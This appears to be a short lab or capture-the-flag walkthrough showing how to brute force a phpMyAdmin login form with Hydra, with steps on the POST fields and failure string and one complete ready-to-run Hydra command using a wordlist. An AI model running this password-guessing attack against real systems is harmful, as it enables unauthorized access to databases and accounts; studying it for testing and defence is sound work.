Brute Force phpMyAdmin Login with Hydra
exploitationtool
Summary
Example Hydra http(s)-post-form attack against a phpMyAdmin login, matching the "Incorrect password" failure string.
Walkthrough
A worked example of brute forcing a phpMyAdmin login form with Hydra.
Steps
- Target the login POST path and supply the known username with
-land a wordlist with-P. - Include all required form fields (
remember,login,proc_login) in the POSTDATA so the request is accepted. - Use the failure string
Incorrect passwordso Hydra knows which responses are wrong; the credential that omits it is valid.
Commands
bash
hydra <IP> -l 0xdf -P /usr/share/seclists/Passwords/twitter-banned.txt https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password"